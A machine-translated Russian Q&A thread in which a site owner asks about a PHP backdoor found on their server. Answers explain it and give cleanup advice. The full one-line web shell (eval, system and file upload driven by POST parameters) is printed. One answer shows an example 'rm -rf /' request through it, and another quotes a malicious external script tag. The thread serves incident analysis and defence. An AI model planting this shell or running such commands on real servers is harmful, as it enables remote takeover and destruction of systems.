Какова цель этого кода PHP / взломать?

Question

Недавно я нашел 4 странных файла на моем сервере (которые я не загружал).Имя файла было таким: goog1e7a20543b128921.php

И вот код, который был внутри них:

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

Вы знаете, что этот код должен делать ..?Должен ли я начать паниковать ..?

Спасибо.

Answer 1

Да, это вредоносный код. Этот сценарий оболочки позволяет выполнять код, а также загружать любой файл, если злоумышленник знает переданные ему параметры. Я рекомендую искать все файлы по этому коду, проверять права доступа к файлам и менять пароли на всякий случай.

Answer 2

Предложение справиться с атакой

Я бы предложил вам использовать HTML-очиститель или OWASP , чтобы обеспечить безопасность.

Вы должны отключить конструкцию eval, если вы ее не используете (и не должны, если вам действительно не нужно).

Анализировать настройки серверадля любых дыр в безопасности:

PHPSecInfo

альтернативный текст http://phpsec.org/images/psi_ss1.png

Answer 3

Для справки:

if($e){eval($e);}

Это позволяет атакующему выполнить любую команду PHP, которую он хочет.

if($s){system($s);}

Это позволяет злоумышленнику выполнить любую системную команду, которую он хочет, как любой пользователь вашего веб-сервера.

if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}

Это позволяет злоумышленнику загрузить любой файл, который он захочет - снова пользователь, которого запускает ваш веб-сервер, определяет права доступа к файлу.

В итоге, паника: -p

Я уверен, что в Интернете есть много статей о том, как справиться с этим. Вкратце, сделайте резервную копию вашей системы для последующего анализа, переустановите сервер с нуля (вы не знаете, что они еще сделали с вами, поэтому просто удалить файлы недостаточно). затыкать отверстие.

Answer 4

Удалить их вправо СЕЙЧАС !

Это бэкдор на вашем веб-сервере.
Он позволяет злоумышленникам отправить запрос на http://you.com/goog1e7a20543b128921.php?s=rm -rf / для удаления всей вашей системы.

Затем вам следует провести тщательный анализ безопасности вашего сайтачтобы выяснить, как они туда попали.

Answer 5

eval ($ e) - система команд удаленного выполнения - экв.для директории listind $ _FILES ['f'] ['name'] - для загрузки и запуска скриптов на сервер и т.д.

Answer 6

Ищите это в каждом файле.<script src="http://nt02.co.in/3"></script> Если вы нашли файл, использующий ваш ftp, посмотрите на дату, когда файл был изменен, откройте все файлы, модифицированные на эту дату, и удалите его.

Answer 7

Похожие: Попробуйте установить phpAntiVirus на будущее и спросите у вашего провайдера mod_security. Это может смягчить будущие хаки. Эти файлы все равно не материализовались на вашем сервере. Избавьтесь от всех старых приложений PHP.

Answer 8

Видимо, вы не единственный, кто с этим. погуглил очень быстро, другие сайты тоже кажутся зараженными. похоже, что все время зараженный файл хранится в папке с изображениями.